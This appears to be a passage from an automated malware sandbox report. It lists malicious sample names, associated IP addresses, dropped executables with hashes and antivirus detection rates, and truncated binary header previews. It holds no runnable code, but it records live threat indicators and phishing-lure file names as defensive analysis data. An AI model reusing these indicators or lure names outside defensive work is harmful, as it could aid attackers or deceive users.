                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            twd.exeGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            0ZQNzv3MyU.exeGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            USD 12,371.35 SWIFT report.exeGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            PAYMENT COPY.pptGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            20210621_064143.htmlGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            Wire Info.docxGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            Nueva orden de env#U00edo .exeGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            Global _Transport NZ..xlsxGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            ghXWqV6o1J.docxGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            idea-22543577.xlsmGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            OzygoxrbzzvtmyjupcpndcovpjxtqpiywjSigned.exeGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
                                                                                                                                            2t71031BUz.exeGet hashmaliciousBrowse
                                                                                                                                            • 74.114.154.22
                                                                                                                                            • 104.21.59.252
                                                                                                                                            • 104.21.65.45
                                                                                                                                            • 162.159.134.233
Match (dropped file), Associated Sample Name / URL, Detection
C:\Program Files (x86)\Browzar\Uninstall.exe
• uphmioXDt5.exe, Detection: malicious
• EdQZWKJ8hC.exe, Detection: malicious
• cqfoBcirKS.exe, Detection: malicious
• ajyyWRGcFo.exe, Detection: malicious
• ccbf1853c703609eda36bc07ab8eb2faf692153b56ecf.exe, Detection: malicious
• 42sB3Upj67.exe, Detection: malicious
• jTBM8kei4u.exe, Detection: malicious
• VvaBHdJoGY.exe, Detection: malicious
• 16X4iz8fTb.exe, Detection: malicious
• e90fG4wc41.exe, Detection: malicious
C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe
• uphmioXDt5.exe, Detection: malicious
C:\Program Files (x86)\Browzar\Browzar.exe
• uphmioXDt5.exe, Detection: malicious
• EdQZWKJ8hC.exe, Detection: malicious
• cqfoBcirKS.exe, Detection: malicious
• ajyyWRGcFo.exe, Detection: malicious
• ccbf1853c703609eda36bc07ab8eb2faf692153b56ecf.exe, Detection: malicious
• 42sB3Upj67.exe, Detection: malicious
• jTBM8kei4u.exe, Detection: malicious
• VvaBHdJoGY.exe, Detection: malicious
• 16X4iz8fTb.exe, Detection: malicious
• e90fG4wc41.exe, Detection: malicious
C:\Program Files (x86)\Browzar\Browzar.exe
Process: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category: dropped
Size (bytes): 228000
Entropy (8bit): 7.766470537786167
Encrypted: false
SSDEEP: 6144:UKObz+evZ2rltMBCLU6TF5efiitf3EW/Sj2t44S/:Uhbz+evZe9cf3EWe2e1
MD5: 847674F996283EB11F244A75F14F69AB
SHA1: 49C335E9C453BC039B1EBF80D443218073CC0732
SHA-256: 3947DD20B0B4DB6EF221606BD63BBA5CB9AE476C485123B2ED2490FB41D42AF6
SHA-512: 842A558B1DF82F66CB1AF52507C73476E36D399A8BCCB1560E42F07109F4D41086CCED25061709B16E41AD86A77A0C5FF7E3558C71007FEA2884A9D0A129B079
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:
• Filename: uphmioXDt5.exe, Detection: malicious
• Filename: EdQZWKJ8hC.exe, Detection: malicious
• Filename: cqfoBcirKS.exe, Detection: malicious
• Filename: ajyyWRGcFo.exe, Detection: malicious
• Filename: ccbf1853c703609eda36bc07ab8eb2faf692153b56ecf.exe, Detection: malicious
• Filename: 42sB3Upj67.exe, Detection: malicious
• Filename: jTBM8kei4u.exe, Detection: malicious
• Filename: VvaBHdJoGY.exe, Detection: malicious
• Filename: 16X4iz8fTb.exe, Detection: malicious
• Filename: e90fG4wc41.exe, Detection: malicious
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........n.wr=.wr=.wr=Y.-=.wr=Tk|=.wr=.hy=.wr=.hx=.wr=.hv=.wr=?hy=.wr=?hv=.wr=.ws=.tr=T./=.wr=.Qy=.wr=.qt=.wr=(Wv=.wr=Rich.wr=........PE..L.....KI.....................p......0.............@..................................u......................................tn..........t^...........l..............................................................................................UPX0....................................UPX1................................@....rsrc....p.......d..................@..............................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe
Process: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 353648
Entropy (8bit): 6.524059510767717
Encrypted: false
SSDEEP: 3072:HxgVEBt0s9VmgI1dTpADWdKKL9Bvz1eM2mzQadFehDmTxlDhlHdj02ggg+lm7LR:HxCds9q7AqdKKb71PjzdAh+hluR
MD5: BB4FD26AB95CB6D7EB25F95AC1F3C2DA
SHA1: 348D95E365BBAE89C2E1D6DA86B6F24890EE6CC4
SHA-256: 468B4ADDACA9AEB12A501530750E08A987E2C4D4F9F9CCAAEC1F97BA67290F70
SHA-512: E1ECBF21B8C44A51F17CD4A540DC219796DDDB725703EB758BEF2AEC92E359146DB790A55AAA375FE6A83D6B0224D667546F95E4FF0C39154B711CD46D4F2B27
Malicious: false
Joe Sandbox View:
• Filename: uphmioXDt5.exe, Detection: malicious
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`............................B.... ........@.. ..............................._....@.....................................J.......0............R..p............................................................ ............... ..H............text...H.... ...................... ..`.rsrc...0...........................@..@.reloc...............P..............@..B................(.......H........7...............................................................+.{....*.+.B+.+.}....*.+..+.....+.{....*.+.B+.+.}....*.+..+.....+.{....*.+.B+.+.}....*.+..+.....~....*..+......*.+..~....*..+......*.+..+.{....*.+.B+.+.}....*.+..+.....~....*..+......*.+..~....*..+......*.+..+.{....*.+.B+.+.}....*.+..+.....~....*..+......*.+...(u...*.+.{....*.+.B+.+.}....*.+..+.....+.{....*.+.B+.+.}....*.+..+.....~....*..+......*.+..+.{....*.+.B+.+.}....*.+..+.....+.{....*.+.B+.+.}....*.
                                                                                                                                                                                      C:\Program Files (x86)\Browzar\Uninstall.exe
                                                                                                                                                                                      Process:C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):112686
                                                                                                                                                                                      Entropy (8bit):6.422116717913919
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:xO/z6hPABUjO/Zd1716EoLiL4l1HdIaqQPDm0xK8i6f0Zn9PRVW8sW45o40KvZu:+zgjO/Zd1RePDmZ8tf05iW4u40Kxu
                                                                                                                                                                                      MD5:F11BFFA11EA93A0DEC2696B418626028
                                                                                                                                                                                      SHA1:F31ED753C52312EA31F3F5B36B42BBA3D43B2649
                                                                                                                                                                                      SHA-256:3C307003566A032AFD865DE8713CA299B33C8405CC67DF296FC299BF1490E220
                                                                                                                                                                                      SHA-512:01B4A501D9CCF54C654DCCC617B9D2C11E6B5A2D47BAFA4ED7EE5296162EEB24A8B0C72A09DCB6A48BDF0789B05F66795979CDF0EC7DAFDC3B7B68D4CD19556C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                      • Filename: uphmioXDt5.exe, Detection: malicious
                                                                                                                                                                                      • Filename: EdQZWKJ8hC.exe, Detection: malicious
                                                                                                                                                                                      • Filename: cqfoBcirKS.exe, Detection: malicious
                                                                                                                                                                                      • Filename: ajyyWRGcFo.exe, Detection: malicious
                                                                                                                                                                                      • Filename: ccbf1853c703609eda36bc07ab8eb2faf692153b56ecf.exe, Detection: malicious
                                                                                                                                                                                      • Filename: 42sB3Upj67.exe, Detection: malicious
                                                                                                                                                                                      • Filename: jTBM8kei4u.exe, Detection: malicious
                                                                                                                                                                                      • Filename: VvaBHdJoGY.exe, Detection: malicious
                                                                                                                                                                                      • Filename: 16X4iz8fTb.exe, Detection: malicious
                                                                                                                                                                                      • Filename: e90fG4wc41.exe, Detection: malicious
                                                                                                                                                                                      Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................4...........C.......P....@..........................0......ur...........@.............................. .......<A..........................................................................................................CODE.....4.......4.................. ..`DATA.........P.......8..............@...BSS..........p.......T...................idata.. ............T..............@....tls.................f...................rdata...............f..............@..P.reloc...............h..............@..P.rsrc...<A.......B...v..............@..P.....................|..............@..P........................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\Browzar\Uninstall.ini
                                                                                                                                                                                      Process:C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe
                                                                                                                                                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2601
                                                                                                                                                                                      Entropy (8bit):5.341706963255943
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:RwhJw4UwV970y3970yH970s970r9701970yC970u970G9701970F970S970s597P:CLnDLkEeHRU+xfLxNM/xLVr+APg
                                                                                                                                                                                      MD5:26F1FAA649805BBB908EA33E1C2A89E4
                                                                                                                                                                                      SHA1:C5CFEBC6DBECEF54806996EDBCED1DF966E6E3C6
                                                                                                                                                                                      SHA-256:13BA9DFEEB62BBF29BE32AE9B9EE73D3FE2536AB89117E90ADC5ADAB11FFEABD
                                                                                                                                                                                      SHA-512:3B883F0ED097E5B0C7AE24A55DA69C7A5F7D421CF59DD356FADBA9969D954D7784425AB9716B4A12BCAB651BCCE8A6C960003B5334842D5573D1091FD02EE7F6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: [f]..1=C:\Program Files (x86)\Browzar\Browzar.exe..2=C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe..3=C:\Program Files (x86)\Browzar\Uninstall.exe..[e]..[u]..[r1]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar 2.0.1..2=DisplayName..[r2]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar 2.0.1..2=DisplayVersion..[r3]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar 2.0.1..2=VersionMajor..[r4]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar 2.0.1..2=VersionMinor..[r5]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar 2.0.1..2=Publisher..[r6]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar 2.0.1..2=DisplayIcon..[r7]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar 2.0.1..2=UninstallString..[r8]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar 2.0.1..2=URLInfoAbout..[r9]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Browzar
                                                                                                                                                                                      C:\Program Files (x86)\Company\NewProduct\Uninstall.exe
                                                                                                                                                                                      Process:C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):99897
                                                                                                                                                                                      Entropy (8bit):6.501288733940089
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:zO/z6hPABUjO/Zd1716EoLiL4l1HdIaqQPDm0xK8i6f0Zn9PRVW8sW45o75M:kzgjO/Zd1RePDmZ8tf05iW4u1M
                                                                                                                                                                                      MD5:56B3225C7B1D6F05B4BA4BA7B4CE2202
                                                                                                                                                                                      SHA1:27C0ED1A6D25A68A48950A7EDE29D87E1F2B1461
                                                                                                                                                                                      SHA-256:B3A3C03A2B140D4FBE9BAC4416866210D014DA4C64355B395715F2D4C2506C46
                                                                                                                                                                                      SHA-512:0A135B42EFBA7BA10D0723663F4BF86EF3C2978A4475C931FDCED1DD5DB5970E55F1995C214854EE43E1C8FED805368B4187B7B936BA8BE30AF260E3DF0EE8F4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                      Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................4...N.......C.......P....@..............................................@.............................. ...................................................................................................................CODE.....4.......4.................. ..`DATA.........P.......8..............@...BSS..........p.......T...................idata.. ............T..............@....tls.................f...................rdata...............f..............@..P.reloc...............h..............@..P.rsrc................v..............@..P.....................|..............@..P........................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\Company\NewProduct\Uninstall.ini
                                                                                                                                                                                      Process:C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
                                                                                                                                                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2615
                                                                                                                                                                                      Entropy (8bit):5.367213984578544
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:RNaZAkj9z39zH9394989zC9r9x9399L9f9/9u9G9G17eHdGVydsJWM0qK1PYDh:7CxBNW6AxzN9RFloBxNVJJWqwPy
                                                                                                                                                                                      MD5:556D97A08E908CF0B3371D4BC025A6CB
                                                                                                                                                                                      SHA1:D840D4F69280ABA86C514F87E957FB38EFA6D423
                                                                                                                                                                                      SHA-256:0910F416E9CCC68263FF27B6C6ACBDDA8C343250C73FD8D5CAA7984CADEF09D1
                                                                                                                                                                                      SHA-512:821A5C5AAB8AEB3DCF303D71365897D03A8878C6D636794CC3979F8B70458D197AE3820D3626F4EB91E019838FC5E57A04B50ED4AE7806C04859B0A7AD60100A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: [f]..1=C:\Program Files (x86)\Company\NewProduct\file4.exe..2=C:\Program Files (x86)\Company\NewProduct\jooyu.exe..3=C:\Program Files (x86)\Company\NewProduct\jingzhang.exe..4=C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe..5=C:\Program Files (x86)\Company\NewProduct\Uninstall.exe..[e]..[u]..[r1]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00..2=DisplayName..[r2]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00..2=DisplayVersion..[r3]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00..2=VersionMajor..[r4]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00..2=VersionMinor..[r5]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00..2=Publisher..[r6]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00..2=DisplayIcon..[r7]..0=2..1=SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00..2=UninstallString..[r8]..0=2..1=
                                                                                                                                                                                      C:\Program Files (x86)\Company\NewProduct\d
                                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):31019008
                                                                                                                                                                                      Entropy (8bit):1.0834209899405411
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24576:fU+oSCdDVmygF5XZ6Rs7R4EPfMkr6fP3rsLO5:s+Vyg+lY
                                                                                                                                                                                      MD5:52125F3C8B5F9B1B25D0A4180F13E0AD
                                                                                                                                                                                      SHA1:BD2D643F4DD8B9E49C29E237E9A1C25BCE3DA0A4
                                                                                                                                                                                      SHA-256:2372AC2E6F5CC5E4C2EA2378AF0A59D30F4D6840501870A5CCEB6B49AD487BB9
                                                                                                                                                                                      SHA-512:FF809A4E3F3E7C28ABC4FE38D48C775810E9D4E0F79E7C845D3C518E5F7F35C54B0DFDDD5D534A827E191EF057678006D566DD93EB9C792FC6FDB25421310D58
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW
                                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1604
                                                                                                                                                                                      Entropy (8bit):5.181964188515715
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:K24CXZESEsutbFzKjD9u9V98p3pcpB39p9au91Q3s:PbpESEsmhK2rA5g/3a21p
                                                                                                                                                                                      MD5:88A0F90EFC44657ED794345A09ADFECD
                                                                                                                                                                                      SHA1:24D43D988F0BA8C0B10D9E7EF8EB3E43BFA57F67
                                                                                                                                                                                      SHA-256:E6692871D929D7EF8ADCEFE6DF5D754040882FDCFAF41BF0D5477C4BE9B5F0E0
                                                                                                                                                                                      SHA-512:28BA9C2A97FE4CDD5B4D2D561E9A1C7BFBB6CCE4EFA53470CC864B7F652A6169E566A89EF2B2BBA045682E493ED3A696F06BAE970CCCBFD35839F2A036897868
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: ***** Repair of database 'd' started [ESENT version 06.02.9200.0000, (ESENT[6.2.9200.0] RETAIL RTM MBCS)]....search for 'ERROR:' to find errors..search for 'WARNING:' to find warnings..checking database header..ERROR: database was not shutdown cleanly (Dirty Shutdown)..database file "d" is 30932992 bytes..database file "d" is 30932992 bytes on disk...Creating 16 threads..checking SystemRoot..SystemRoot (OE)..ERROR: page 2: dbtime is larger than database dbtime (0x4f2a, 0x3f87)..SystemRoot (AE)..ERROR: page 3: dbtime is larger than database dbtime (0x4f2c, 0x3f87)..checking system tables..MSysObjects ..MSysObjectsShadow ..MSysObjects:.7004:.ERROR: page 13: dbtime is larger than database dbtime (0x3fc6, 0x3f87)..MSysObjects:.7004:.ERROR: page 14: dbtime is larger than database dbtime (0x46bb, 0x3f87)..MSysObjects:.7004:.ERROR: page 20: dbtime is larger than database dbtime (0x4f7f, 0x3f87)..MSysObjects Name..MSysObjects RootObjects..MSysObjectsShadow:.7004:.ERROR: page 27: dbtime is larg
                                                                                                                                                                                      C:\Program Files (x86)\Company\NewProduct\d.jfm
                                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8192
                                                                                                                                                                                      Entropy (8bit):0.07543732783435073
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:c39yt2t1xqa6lDfyt8ll:cgti1ct5at0
                                                                                                                                                                                      MD5:62346E08D48D339F939119D9615CB929
                                                                                                                                                                                      SHA1:FF0F231EFE6A170008F8B0F40AF8A25BDA1F80D1
                                                                                                                                                                                      SHA-256:7C06A9E414F4C8C4FE6FFF23E02286AB2D59650E8A063895F55BAFEB78E986E4
                                                                                                                                                                                      SHA-512:D37126B6509C01068A09A89C861CE92B62DF4AE54EDE2B0FD78452E8693B68557D20FB4BA6284019930C390F8C7BB3779D4C2D65F053079BD85F43AB8AD5364A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .2?..........................................y.......y..................................\.. .....y.................D#.......y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\Company\NewProduct\file4.exe
Process:C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):163840
Entropy (8bit):7.020025749730853
Encrypted:false
SSDEEP:3072:CaY0LwJiwqkCPyIrxC55W4NfrZL5P1yxRrh485qC96QnoSe:C7Ylvx83L5aRl4Isp3
MD5:02580709C0E95ABA9FDD1FBDF7C348E9
SHA1:C39C2F4039262345121ECEE1EA62CC4A124A0347
SHA-256:70D1BFB908EAB66681A858D85BB910B822CC76377010ABD6A77FD5A78904EA15
SHA-512:1DE4F5C98A1330A75F3CCC8A07E095640AAC893A41A41BFA7D0CD7EBC11D22B706DBD91E0EB9A8FE027B6365C0D4CAD57AB8F1B130A77AC1B1A4DA2C21A34CB5
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 19%
• Antivirus: ReversingLabs, Detection: 79%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a.Q...Q...Q...v.r.A...v.a.y...v.b.:...v.t.D...Q.......v.~.S...v.s.P...v.w.P...RichQ...........................PE..L...7..G.............................;............@.........................................................................d........`..,............p..($..............................................@...............d............................text............................... ..`.rdata...Z.......`..................@..@.data....,...0... ...0..............@....rsrc...,....`... ...P..............@..@.text0...............p..........................................................................................................................................................................................................................................................................................................................................
C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
Process:C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1123869
Entropy (8bit):7.153743574847911
Encrypted:false
SSDEEP:24576:TGgoe5Q0nyofLPeHy2sjv7myfXrNXbjFveqqb:KwQ0nyoz3tvHLleBb
MD5:A4C547CFAC944AD816EDF7C54BB58C5C
SHA1:B1D3662D12A400ADA141E24BC014C256F5083EB0
SHA-256:2F158FE98389B164103A1C3AAC49E10520DFD332559D64A546B65AF7EF00CD5F
SHA-512:AD5891FAEE33A7F91C5F699017C2C14448CA6FDA23AC10DC449354CE2C3E533383DF28678E0D170856400F364A99F9996AD35555BE891D2D9EF97D83FDD91BBB
Malicious:true
Antivirus:
• Antivirus: Metadefender, Detection: 29%
• Antivirus: ReversingLabs, Detection: 79%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................r.................r.................Rich...........................PE..L......Z.................@...@...............P....@.........................................................................|T..P....................................................................................P...............................text...h=.......@.................. ..`.rdata.......P.......P..............@..@.data...<....`...0...`..............@...................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
Process:C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):994816
Entropy (8bit):7.367152366876468
Encrypted:false
SSDEEP:24576:6dWdWjFMYKO1ZcqlHrorVCkTNkdBAnlXG6+Z1mbXEC:FSMYKO1ZcmHsrVCokUlXF+Z1IUC
MD5:AED57D50123897B0012C35EF5DEC4184
SHA1:568571B12CA44A585DF589DC810BF53ADF5E8050
SHA-256:096021EB5950EE16B7EC51756ABE05F90C3530206E16286E7610B8A5A544A85E
SHA-512:EA0EE3A0762BAA3539E8026A8C624AD897EFE005FAADCF1FF67EBFC555F29B912B24AD4342D5E0C209F36F5288867246BD1BDFED7DF739E608A72FA7B4FA2D7C
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 44%
• Antivirus: ReversingLabs, Detection: 90%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..o...o...o..l...o..j...o..k...o.O.k...o.O.l...o.O.j...o..n...o...n...o...f...o.......o.......o...m...o.Rich..o.................PE..L...-..`................. ..........k........0....@..........................`............@.................................\...P................................L...3..p...................04......x3..@............0...............................text...B........ .................. ..`.rdata...}...0...~...$..............@..@.data....5.......&..................@....rsrc...............................@..@.reloc...L.......N..................@..B................................................................................................................................................................................................................................................................................................
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
Process:C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):732160
Entropy (8bit):7.942489477959937
Encrypted:false
SSDEEP:12288:Q2VU2WB3OzCPZuv6YBsKYwLqVApHgdrGIV/LqBW9G9DCSK1n+jF9nMrcf94IilAS:rG2qezCPZa6HfwiAoiTBWsRCSWnS5f9U
MD5:7A151DB96E506BD887E3FFA5AB81B1A5
SHA1:1133065FCE3B06BD483B05CCA09E519B53F71447
SHA-256:288376E11301C8CA3EB52871D09133F0199B911A33B9658579929EF6BAC8EA6C
SHA-512:33B21B9A3F84A847475C99C642447138344FC53379C40044B50768E5EBE2FA5B5064126678151D86FB4AA47E4B4A8FEFD2B20EE126ABF11D1C9E56D46A2FBE78
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 34%
• Antivirus: ReversingLabs, Detection: 93%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`S=@.=n@.=n@.=n%g>oW.=n%g8o..=n%g9oX.=n.i>oX.=n.h8ob.=n.i8o..=n.i9od.=n%g<o[.=n@.<n..=n.h4oO.=n.h?oA.=nRich@.=n................PE..L......`..........................................@.........................................................................{...........................................................................@...............t............................text...6s.......................... ..`.rdata..............................@..@.data..............................@....vmp0....~... ...................... ....vmp1...4$.......&.................. ....reloc...............*..............@..B................................................................................................................................................................................................................................................................
C:\Program Files (x86)\Company\NewProduct\tmp.edb
Process:C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x76335dd9, page size 32768, JustCreated, Windows version 0.0
Category:dropped
Size (bytes):196608
Entropy (8bit):0.2862983094388781
Encrypted:false
SSDEEP:12:Ao00So00J5b0yg5pzw1U7aNfv9XXXXXXXXXXXXXXX:J0yQWNf
MD5:567D8A36BF858860A49CF0BF6B384C25
SHA1:FB5EE205433E50E852805DCF1F1A5A6D7638A3D6
SHA-256:4F7276CF7BB43C99D223FC8F380317564504C35EDDC6668611DD7F06EFDE74EE
SHA-512:F028FC53764736B2554979B81EE14650ED580E1DD4F358C28C7D431B078A37237C0876FCFA393BE7096ED40B6FA8EE6FF5FA2C9A9ACF932CBCF303648F2BBFDA
Malicious:false
Preview: v3].... .......@.......O4.7.....y.................................................................................................................................................................................................................................................................................................................. ...................................................................................................................................................................................................................................................y........y......................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Program Files (x86)\lighteningplayer\connection.dll
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):851498
Entropy (8bit):5.999129725124293
Encrypted:false
SSDEEP:12288:FIsudTRfCgj+dcpdCBEO4T1OR62/nDVygvK8F4Kq:msudTh5UUwEO4TI5DVyiK8F4Kq
MD5:3F0352C50C92AA9F8659CD9FF8F77181
SHA1:1E9283284471B8C7B27F506B1CBA3A16624AE725
SHA-256:6DAD82E52827E9BFAA91831947BA351FDDA5CA8564DCA46FA0220F35933FC22D
SHA-512:F93CC8AD89D9DE76AA51AED371F7CE8EB975CFC4AD2C7C78D71E9EE1465E43A9E1B17BFA8C6B8974B1B9BC210E4139D9B18221C0863EAEC0BD201178B0E74AD3
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
